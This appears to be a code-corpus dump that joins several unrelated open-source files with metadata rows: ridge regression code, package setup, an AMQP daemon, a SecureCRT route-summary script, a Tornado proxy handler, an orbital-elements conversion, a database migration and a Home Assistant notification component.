G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
G_diag = np.diag(G)
# handle case when y is 2-d
G_diag = G_diag if len(y.shape) == 1 else G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values(self, K, v, Q, y, alpha):
n_samples = y.shape[0]
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
KG = np.dot(K, G)
#KG = np.dot(np.dot(Q, np.diag(v / (v + alpha))), Q.T)
KG_diag = np.diag(KG)
denom = np.ones(n_samples) - KG_diag
if len(y.shape) == 2:
# handle case when y is 2-d
KG_diag = KG_diag[:, np.newaxis]
denom = denom[:, np.newaxis]
num = np.dot(KG, y) - KG_diag * y
return num / denom, c
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
n_samples = X.shape[0]
X, y, X_mean, y_mean, X_std = LinearModel._center_data(X, y,
self.fit_intercept, self.normalize, self.copy_X)
K, v, Q = self._pre_compute(X, y)
n_y = 1 if len(y.shape) == 1 else y.shape[1]
M = np.zeros((n_samples * n_y, len(self.alphas)))
C = []
error = self.score_func is None and self.loss_func is None
for i, alpha in enumerate(self.alphas):
if error:
out, c = self._errors(v, Q, y, sample_weight * alpha)
else:
out, c = self._values(K, v, Q, y, sample_weight * alpha)
M[:, i] = out.ravel()
C.append(c)
if error:
best = M.mean(axis=0).argmin()
else:
func = self.score_func if self.score_func else self.loss_func
out = [func(y.ravel(), M[:, i]) for i in range(len(self.alphas))]
best = np.argmax(out) if self.score_func else np.argmin(out)
self.best_alpha = self.alphas[best]
self.dual_coef_ = C[best]
self.coef_ = safe_sparse_dot(self.dual_coef_.T, X)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeCV(LinearModel):
"""Ridge regression with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation. Currently, only the n_features >
n_samples case is handled efficiently.
Parameters
----------
alphas: numpy array of shape [n_alpha]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
        order to evaluate the performance of prediction (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
        order to evaluate the performance of prediction (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
        If None, Generalized Cross-Validation (efficient Leave-One-Out)
will be used.
See also
--------
Ridge, RidgeClassifierCV
"""
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]), fit_intercept=True,
normalize=False, score_func=None, loss_func=None, cv=None):
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.cv = cv
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
if self.cv is None:
            estimator = _RidgeGCV(self.alphas, fit_intercept=self.fit_intercept,
                                  normalize=self.normalize,
                                  score_func=self.score_func,
                                  loss_func=self.loss_func)
estimator.fit(X, y, sample_weight=sample_weight)
self.best_alpha = estimator.best_alpha
else:
parameters = {'alpha': self.alphas}
# FIXME: sample_weight must be split into training/validation data
# too!
#fit_params = {'sample_weight' : sample_weight}
fit_params = {}
gs = GridSearchCV(Ridge(fit_intercept=self.fit_intercept),
parameters, fit_params=fit_params, cv=self.cv)
gs.fit(X, y)
estimator = gs.best_estimator_
self.best_alpha = gs.best_estimator_.alpha
self.coef_ = estimator.coef_
self.intercept_ = estimator.intercept_
return self
class RidgeClassifierCV(RidgeCV):
def fit(self, X, y, sample_weight=1.0, class_weight=None):
"""Fit the ridge classifier.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : float or numpy array of shape [n_samples]
Sample weight
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
Returns
-------
self : object
Returns self.
"""
if class_weight is None:
class_weight = {}
sample_weight2 = np.array([class_weight.get(k, 1.0) for k in y])
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
RidgeCV.fit(self, X, Y,
sample_weight=sample_weight * sample_weight2)
return self
def decision_function(self, X):
return RidgeCV.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
|
bsd-3-clause
| -420,045,437,906,127,550
| 31.157983
| 79
| 0.580799
| false
| 3.860775
| false
| false
| false
|
davidvicenteranz/drf-api-dump
|
setup.py
|
1
|
1451
|
# -*- coding: utf-8 -*-
from setuptools import setup
DESCRIPTION = """
This Django app is intended for **dumping data from apps or models via HTTP**. Basically it exposes
the dumpdata command over HTTP.
Features:
- Just accesible by superusers
- Ability to include or exclude any specific app or model
Requirements:
- Django (Developed under v1.11)
- Django Rest Framework (Developed under v3.4.3)
More on https://github.com/davidvicenteranz/drf-api-dump/
"""
setup(
name='drf-api-dump',
version='0.1.3',
author='David Vicente Ranz',
author_email='dvicente74@gmail.com',
include_package_data=True,
packages=[
'drf_api_dump'
],
url='https://github.com/davidvicenteranz/drf-api-dump/',
license='MIT license',
description='Dumps data from apps or models via HTTP',
long_description=DESCRIPTION,
install_requires=[
'djangorestframework'
],
keywords='django dumpdata development',
classifiers=(
'Framework :: Django',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules'
),
)
|
mit
| -2,079,235,607,391,890,700
| 27.470588
| 93
| 0.641626
| false
| 3.89008
| false
| false
| false
|
edeposit/edeposit.amqp
|
bin/edeposit_amqp_ltpd.py
|
1
|
2504
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
"""
AMQP binding for LTP exporter. See `edeposit.amqp.ltp
<https://github.com/edeposit/edeposit.amqp.ltp>`_ for details.
"""
import os
import sys
import os.path
import argparse
from pika.exceptions import ConnectionClosed
from edeposit.amqp.ltp import *
# if the amqp module wasn't yet installed at this system, load it from package
try:
from edeposit.amqp import settings
except ImportError:
sys.path.insert(0, os.path.abspath('../edeposit/'))
import amqp
sys.modules["edeposit.amqp"] = amqp
from edeposit.amqp.amqpdaemon import AMQPDaemon, getConParams
from edeposit.amqp import settings
# Functions & objects =========================================================
def main(args, stop=False):
"""
Arguments parsing, etc..
"""
daemon = AMQPDaemon(
con_param=getConParams(
settings.RABBITMQ_LTP_VIRTUALHOST
),
queue=settings.RABBITMQ_LTP_INPUT_QUEUE,
out_exch=settings.RABBITMQ_LTP_EXCHANGE,
out_key=settings.RABBITMQ_LTP_OUTPUT_KEY,
react_fn=reactToAMQPMessage,
glob=globals() # used in deserializer
)
if not stop and args.foreground: # run at foreground
daemon.run()
else:
daemon.run_daemon() # run as daemon
# Main program ================================================================
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == "stop":
main(None, stop=True)
sys.exit(0)
parser = argparse.ArgumentParser(
usage='%(prog)s start/stop/restart [-f/--foreground]',
description="""AMQP daemon for LTP exporter."""
)
parser.add_argument(
"action",
metavar="start/stop/restart",
type=str,
default=None,
help="Start/stop/restart the daemon."
)
parser.add_argument(
"-f",
'--foreground',
action="store_true",
required=False,
help="""Run at foreground, not as daemon. If not set, script is will
run at background as unix daemon."""
)
args = parser.parse_args()
try:
main(args)
except ConnectionClosed as e:
sys.stderr.write(
e.message + " - is the RabbitMQ queues properly set?\n"
)
sys.exit(1)
except KeyboardInterrupt:
pass
|
gpl-2.0
| 4,022,404,615,706,803,700
| 26.217391
| 79
| 0.567492
| false
| 3.793939
| false
| false
| false
|
garibaldi0/SecureCRT
|
s_nexthop_summary.py
|
1
|
13227
|
# $language = "python"
# $interface = "1.0"
import os
import sys
import logging
# Add script directory to the PYTHONPATH so we can import our modules (only if run from SecureCRT)
if 'crt' in globals():
script_dir, script_name = os.path.split(crt.ScriptFullName)
if script_dir not in sys.path:
sys.path.insert(0, script_dir)
else:
script_dir, script_name = os.path.split(os.path.realpath(__file__))
# Now we can import our custom modules
from securecrt_tools import scripts
from securecrt_tools import utilities
from securecrt_tools import ipaddress
# Create global logger so we can write debug messages from any function (if debug mode setting is enabled in settings).
logger = logging.getLogger("securecrt")
logger.debug("Starting execution of {0}".format(script_name))
# ################################################ SCRIPT LOGIC ###################################################
def script_main(session, ask_vrf=True, vrf=None):
"""
| SINGLE device script
| Author: Jamie Caesar
| Email: jcaesar@presidio.com
This script will grab the route table information from a Cisco IOS or NXOS device and export details about each
next-hop address (how many routes and from which protocol) into a CSV file. It will also list all connected
networks and give a detailed breakdown of every route that goes to each next-hop.
:param session: A subclass of the sessions.Session object that represents this particular script session (either
SecureCRTSession or DirectSession)
:type session: sessions.Session
:param ask_vrf: A boolean that specifies if we should prompt for which VRF. The default is true, but when this
        module is called from other scripts, we may want to avoid prompting and supply the VRF with the "vrf" input.
:type ask_vrf: bool
:param vrf: The VRF that we should get the route table from. This is used only when ask_vrf is False.
:type vrf: str
"""
# Get script object that owns this session, so we can check settings, get textfsm templates, etc
script = session.script
# Start session with device, i.e. modify term parameters for better interaction (assuming already connected)
session.start_cisco_session()
# Validate device is running a supported OS
session.validate_os(["IOS", "NXOS"])
# If we should prompt for a VRF, then do so. Otherwise use the VRF passed into the function (if any)
if ask_vrf:
selected_vrf = script.prompt_window("Enter the VRF name. (Leave blank for default VRF)")
else:
selected_vrf = vrf
# If we have a VRF, modify our commands and hostname to reflect it. If not, pull the default route table.
if selected_vrf:
send_cmd = "show ip route vrf {0}".format(selected_vrf)
session.hostname = session.hostname + "-VRF-{0}".format(selected_vrf)
logger.debug("Received VRF: {0}".format(selected_vrf))
else:
send_cmd = "show ip route"
raw_routes = session.get_command_output(send_cmd)
if session.os == "IOS":
template_file = script.get_template("cisco_ios_show_ip_route.template")
else:
template_file = script.get_template("cisco_nxos_show_ip_route.template")
fsm_results = utilities.textfsm_parse_to_dict(raw_routes, template_file)
route_list = parse_routes(fsm_results)
output_filename = session.create_output_filename("nexthop-summary", ext=".csv")
output = nexthop_summary(route_list)
utilities.list_of_lists_to_csv(output, output_filename)
# Return terminal parameters back to the original state.
session.end_cisco_session()
def update_empty_interfaces(route_table):
"""
    Takes the route table as a list of dictionaries (with dict key names used in the parse_routes function) and does
recursive lookups to find the outgoing interface for those entries in the route-table where the outgoing interface
isn't listed.
:param route_table: Route table information as a list of dictionaries (output from TextFSM)
:type route_table: list of dict
:return: The updated route_table object with outbound interfaces filled in.
:rtype: list of dict
"""
def recursive_lookup(nexthop):
"""
Recursively looks up a route to find the actual next-hop on a connected network.
:param nexthop: The next-hop IP that we are looking for
:type nexthop: securecrt_tools.ipaddress
:return: The directly connected next-hop for the input network.
:rtype: securecrt_tools.ipaddress
"""
for network in connected:
if nexthop in network:
return connected[network]
for network in statics:
if nexthop in network:
return recursive_lookup(statics[network])
return None
logger.debug("STARTING update_empty_interfaces")
connected = {}
unknowns = {}
statics = {}
for route in route_table:
if route['protocol'] == 'connected':
connected[route['network']] = route['interface']
if route['protocol'] == 'static':
if route['nexthop']:
statics[route['network']] = route['nexthop']
if route['nexthop'] and not route['interface']:
unknowns[route['nexthop']] = None
for nexthop in unknowns:
unknowns[nexthop] = recursive_lookup(nexthop)
for route in route_table:
if not route['interface']:
if route['nexthop'] in unknowns:
route['interface'] = unknowns[route['nexthop']]
logger.debug("ENDING update_empty_interfaces")
def parse_routes(fsm_routes):
"""
This function will take the TextFSM parsed route-table from the `textfsm_parse_to_dict` function. Each dictionary
in the TextFSM output represents a route entry. Each of these dictionaries will be updated to convert IP addresses
into ip_address or ip_network objects (from the ipaddress.py module). Some key names will also be updated also.
:param fsm_routes: TextFSM output from the `textfsm_parse_to_dict` function.
:type fsm_routes: list of dict
:return: An updated list of dictionaries that replaces IP address strings with objects from the ipaddress.py module
:rtype: list of dict
"""
logger.debug("STARTING parse_routes function.")
complete_table = []
for route in fsm_routes:
new_entry = {}
logger.debug("Processing route entry: {0}".format(str(route)))
new_entry['network'] = ipaddress.ip_network(u"{0}/{1}".format(route['NETWORK'], route['MASK']))
new_entry['protocol'] = utilities.normalize_protocol(route['PROTOCOL'])
if route['NEXTHOP_IP'] == '':
new_entry['nexthop'] = None
else:
new_entry['nexthop'] = ipaddress.ip_address(unicode(route['NEXTHOP_IP']))
if route["NEXTHOP_IF"] == '':
new_entry['interface'] = None
else:
new_entry['interface'] = route['NEXTHOP_IF']
# Nexthop VRF will only occur in NX-OS route tables (%vrf-name after the nexthop)
if 'NEXTHOP_VRF' in route:
if route['NEXTHOP_VRF'] == '':
new_entry['vrf'] = None
else:
new_entry['vrf'] = route['NEXTHOP_VRF']
logger.debug("Adding updated route entry '{0}' based on the information: {1}".format(str(new_entry),
str(route)))
complete_table.append(new_entry)
update_empty_interfaces(complete_table)
logger.debug("ENDING parse_route function")
return complete_table
def nexthop_summary(textfsm_dict):
"""
A function that builds a CSV output (list of lists) that displays the summary information after analyzing the
input route table.
:param textfsm_dict: The route table information in list of dictionaries format.
:type textfsm_dict: list of dict
:return: The nexthop summary information in a format that can be easily written to a CSV file.
:rtype: list of lists
"""
    # Identify connected or other local networks -- mostly found in NXOS -- to exclude from next-hops. These are excluded
# from the nexthop summary (except connected has its own section in the output).
logger.debug("STARTING nexthop_summary function")
local_protos = ['connected', 'local', 'hsrp', 'vrrp', 'glbp']
# Create a list of all dynamic protocols from the provided route table. Add total and statics to the front.
proto_list = []
for entry in textfsm_dict:
if entry['protocol'] not in proto_list and entry['protocol'] not in local_protos:
logger.debug("Found protocol '{0}' in the table".format(entry['protocol']))
proto_list.append(entry['protocol'])
proto_list.sort(key=utilities.human_sort_key)
proto_list.insert(0, 'total')
proto_list.insert(0, 'interface')
# Create dictionaries to store summary information as we process the route table.
summary_table = {}
connected_table = {}
detailed_table = {}
# Process the route table to populate the above 3 dictionaries.
for entry in textfsm_dict:
logger.debug("Processing route: {0}".format(str(entry)))
# If the route is connected, local or an FHRP entry
if entry['protocol'] in local_protos:
if entry['protocol'] == 'connected':
if entry['interface'] not in connected_table:
connected_table[entry['interface']] = []
connected_table[entry['interface']].append(str(entry['network']))
else:
if entry['nexthop']:
if 'vrf' in entry and entry['vrf']:
nexthop = "{0}%{1}".format(entry['nexthop'], entry['vrf'])
else:
nexthop = str(entry['nexthop'])
elif entry['interface'].lower() == "null0":
nexthop = 'discard'
if nexthop not in summary_table:
# Create an entry for this next-hop, containing zero count for all protocols.
summary_table[nexthop] = {}
summary_table[nexthop].update(zip(proto_list, [0] * len(proto_list)))
summary_table[nexthop]['interface'] = entry['interface']
# Increment total and protocol specific count
summary_table[nexthop][entry['protocol']] += 1
summary_table[nexthop]['total'] += 1
if nexthop not in detailed_table:
detailed_table[nexthop] = []
detailed_table[nexthop].append((str(entry['network']), entry['protocol']))
# Convert summary_table into a format that can be printed to the CSV file.
output = []
header = ["Nexthop", "Interface", "Total"]
header.extend(proto_list[2:])
output.append(header)
summary_keys = sorted(summary_table.keys(), key=utilities.human_sort_key)
for key in summary_keys:
line = [key]
for column in proto_list:
line.append(summary_table[key][column])
output.append(line)
output.append([])
# Convert the connected_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Connected:"])
output.append(["Interface", "Network(s)"])
connected_keys = sorted(connected_table.keys(), key=utilities.human_sort_key)
for key in connected_keys:
line = [key]
for network in connected_table[key]:
line.append(network)
output.append(line)
output.append([])
# Convert the detailed_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Route Details"])
output.append(["Nexthop", "Network", "Protocol"])
detailed_keys = sorted(detailed_table.keys(), key=utilities.human_sort_key)
for key in detailed_keys:
for network in detailed_table[key]:
line = [key]
line.extend(list(network))
output.append(line)
output.append([])
# Return the output, ready to be sent to directly to a CSV file
logger.debug("ENDING nexthop_summary function")
return output
# ################################################ SCRIPT LAUNCH ###################################################
# If this script is run from SecureCRT directly, use the SecureCRT specific class
if __name__ == "__builtin__":
# Initialize script object
crt_script = scripts.CRTScript(crt)
# Get session object for the SecureCRT tab that the script was launched from.
crt_session = crt_script.get_main_session()
# Run script's main logic against our session
script_main(crt_session)
# Shutdown logging after
logging.shutdown()
# If the script is being run directly, use the simulation class
elif __name__ == "__main__":
# Initialize script object
direct_script = scripts.DebugScript(os.path.realpath(__file__))
# Get a simulated session object to pass into the script.
sim_session = direct_script.get_main_session()
# Run script's main logic against our session
script_main(sim_session)
# Shutdown logging after
logging.shutdown()
|
apache-2.0
| -3,942,150,797,001,814,000
| 40.46395
| 119
| 0.641113
| false
| 4.120561
| false
| false
| false
|
alejandrobernardis/python-slot-machines
|
src/backend/backend/api/public/services.py
|
1
|
3062
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Asumi Kamikaze Inc.
# Licensed under the MIT License.
# Author: Alejandro M. Bernardis
# Email: alejandro (dot) bernardis (at) asumikamikaze (dot) com
# Created: 02/Oct/2014 2:46 PM
from backend.api.base import BaseHandler
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
class ServiceHandler(BaseHandler):
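    """Reverse-proxy handler: forwards each public API request to the matching
    internal service endpoint (the same URI prefixed with '/s') and relays the
    response back to the client."""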
def _get_url(self, with_domain=True):
url = '/s' + self.request.uri
if with_domain:
url = self.api_domain('http') + url
return url
@gen.coroutine
def _set_request(self):
response = None
try:
request = HTTPRequest(self._get_url())
request.method = self.request.method
request.headers = self.request.headers
if self.request.method in ("POST", "DELETE", "PATCH", "PUT"):
request.body = self.request.body
response = yield AsyncHTTPClient().fetch(request)
self.write(response.body)
except Exception, e:
self.get_json_exception_response_and_finish(e)
raise gen.Return(response)
def prepare(self):
self.set_header_for_json()
def compute_etag(self):
return None
@gen.coroutine
def head(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def get(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def post(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def delete(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def patch(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def put(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def options(self, *args, **kwargs):
yield self._set_request()
handlers_list = [
(r'/sign/in(?P<uid>\/[a-z0-9]+)?/?', ServiceHandler),
(r'/sign/out/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/find_golden_eggs/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/roulette/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/slot/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/android/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/ios/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/media/nags/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/sync/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/request/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/invite/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/notifications/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/share/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/balance/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/slots/(?P<sid>[a-z0-9]+)/?', ServiceHandler)
]
|
mit
| -3,224,450,806,062,539,300
| 33.022222
| 73
| 0.59177
| false
| 3.176349
| false
| false
| false
|
lasr/orbital_elements
|
convert/meeEl_meefl.py
|
1
|
1858
|
import numpy as np
__author__ = "Nathan I. Budd"
__email__ = "nibudd@gmail.com"
__copyright__ = "Copyright 2017, LASR Lab"
__license__ = "MIT"
__version__ = "0.1"
__status__ = "Production"
__date__ = "08 Mar 2017"
def meeEl_meefl(meefl):
"""Convert MEEs with true longitude to eccentric longitude.
Args:
meefl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, fl), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
fl = true longitude
Returns:
meeEl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, El), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
El = eccentric longitude
"""
f = meefl[:, 1:2]
g = meefl[:, 2:3]
fl = meefl[:, 5:6]
e = (f**2 + g**2)**.5
B = ((1 + e) / (1 - e))**.5
tan_wbar_by_2 = ((e - f) / (e + f))**0.5
tan_fl_by_2 = np.tan(fl/2)
tan_E_by_2 = 1/B * ((tan_fl_by_2 - tan_wbar_by_2) /
(1 + tan_fl_by_2 * tan_wbar_by_2))
tan_El_by_2 = ((tan_E_by_2 + tan_wbar_by_2) /
(1 - tan_E_by_2 * tan_wbar_by_2))
El = np.mod((2*np.arctan(tan_El_by_2)), 2*np.pi)
return np.concatenate((meefl[:, 0:5], El), axis=1)
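# Hedged usage sketch (not part of the original module): run the conversion on one
# illustrative element set; the numeric values are assumptions chosen only to
# exercise the function.
if __name__ == "__main__":
    sample = np.array([[7000.0, 0.01, 0.005, 0.0, 0.0, 0.5]])
    print(meeEl_meefl(sample))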
|
mit
| 7,915,249,333,846,053,000
| 35.431373
| 77
| 0.55436
| false
| 2.963317
| false
| false
| false
|
beni55/djangolint
|
project/lint/migrations/0002_auto__add_fix.py
|
2
|
2293
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Fix'
db.create_table('lint_fix', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('report', self.gf('django.db.models.fields.related.ForeignKey')(related_name='fixes', to=orm['lint.Report'])),
('path', self.gf('django.db.models.fields.CharField')(max_length=255)),
('line', self.gf('django.db.models.fields.PositiveIntegerField')()),
('source', self.gf('django.db.models.fields.TextField')()),
('error', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('lint', ['Fix'])
def backwards(self, orm):
# Deleting model 'Fix'
db.delete_table('lint_fix')
models = {
'lint.fix': {
'Meta': {'object_name': 'Fix'},
'error': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.PositiveIntegerField', [], {}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'report': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fixes'", 'to': "orm['lint.Report']"}),
'source': ('django.db.models.fields.TextField', [], {})
},
'lint.report': {
'Meta': {'ordering': "['-created']", 'object_name': 'Report'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stage': ('django.db.models.fields.CharField', [], {'default': "'waiting'", 'max_length': '10'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['lint']
|
isc
| 781,272,958,794,556,400
| 44.86
| 130
| 0.549935
| false
| 3.777595
| false
| false
| false
|
fbradyirl/home-assistant
|
homeassistant/components/persistent_notification/__init__.py
|
1
|
6944
|
"""Support for displaying persistent notifications."""
from collections import OrderedDict
import logging
from typing import Awaitable
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
ATTR_CREATED_AT = "created_at"
ATTR_MESSAGE = "message"
ATTR_NOTIFICATION_ID = "notification_id"
ATTR_TITLE = "title"
ATTR_STATUS = "status"
DOMAIN = "persistent_notification"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
EVENT_PERSISTENT_NOTIFICATIONS_UPDATED = "persistent_notifications_updated"
SERVICE_CREATE = "create"
SERVICE_DISMISS = "dismiss"
SERVICE_MARK_READ = "mark_read"
SCHEMA_SERVICE_CREATE = vol.Schema(
{
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_TITLE): cv.template,
vol.Optional(ATTR_NOTIFICATION_ID): cv.string,
}
)
SCHEMA_SERVICE_DISMISS = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
SCHEMA_SERVICE_MARK_READ = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
DEFAULT_OBJECT_ID = "notification"
_LOGGER = logging.getLogger(__name__)
STATE = "notifying"
STATUS_UNREAD = "unread"
STATUS_READ = "read"
WS_TYPE_GET_NOTIFICATIONS = "persistent_notification/get"
SCHEMA_WS_GET = websocket_api.BASE_COMMAND_MESSAGE_SCHEMA.extend(
{vol.Required("type"): WS_TYPE_GET_NOTIFICATIONS}
)
@bind_hass
def create(hass, message, title=None, notification_id=None):
"""Generate a notification."""
hass.add_job(async_create, hass, message, title, notification_id)
@bind_hass
def dismiss(hass, notification_id):
"""Remove a notification."""
hass.add_job(async_dismiss, hass, notification_id)
@callback
@bind_hass
def async_create(
hass: HomeAssistant, message: str, title: str = None, notification_id: str = None
) -> None:
"""Generate a notification."""
data = {
key: value
for key, value in [
(ATTR_TITLE, title),
(ATTR_MESSAGE, message),
(ATTR_NOTIFICATION_ID, notification_id),
]
if value is not None
}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_CREATE, data))
@callback
@bind_hass
def async_dismiss(hass: HomeAssistant, notification_id: str) -> None:
"""Remove a notification."""
data = {ATTR_NOTIFICATION_ID: notification_id}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_DISMISS, data))
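# Hedged usage sketch (not part of the original module): how another integration might
# call the helpers above; the notification id and text are illustrative only.
def _example_usage(hass: HomeAssistant) -> None:
    """Create and later dismiss a notification (illustrative)."""
    async_create(hass, "Backup finished", title="Backup", notification_id="backup_done")
    async_dismiss(hass, "backup_done")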
async def async_setup(hass: HomeAssistant, config: dict) -> Awaitable[bool]:
"""Set up the persistent notification component."""
persistent_notifications = OrderedDict()
hass.data[DOMAIN] = {"notifications": persistent_notifications}
@callback
def create_service(call):
"""Handle a create notification service call."""
title = call.data.get(ATTR_TITLE)
message = call.data.get(ATTR_MESSAGE)
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
if notification_id is not None:
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
else:
entity_id = async_generate_entity_id(
ENTITY_ID_FORMAT, DEFAULT_OBJECT_ID, hass=hass
)
notification_id = entity_id.split(".")[1]
attr = {}
if title is not None:
try:
title.hass = hass
title = title.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering title %s: %s", title, ex)
title = title.template
attr[ATTR_TITLE] = title
try:
message.hass = hass
message = message.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering message %s: %s", message, ex)
message = message.template
attr[ATTR_MESSAGE] = message
hass.states.async_set(entity_id, STATE, attr)
# Store notification and fire event
# This will eventually replace state machine storage
persistent_notifications[entity_id] = {
ATTR_MESSAGE: message,
ATTR_NOTIFICATION_ID: notification_id,
ATTR_STATUS: STATUS_UNREAD,
ATTR_TITLE: title,
ATTR_CREATED_AT: dt_util.utcnow(),
}
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def dismiss_service(call):
"""Handle the dismiss notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
return
hass.states.async_remove(entity_id)
del persistent_notifications[entity_id]
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def mark_read_service(call):
"""Handle the mark_read notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
_LOGGER.error(
"Marking persistent_notification read failed: "
"Notification ID %s not found.",
notification_id,
)
return
persistent_notifications[entity_id][ATTR_STATUS] = STATUS_READ
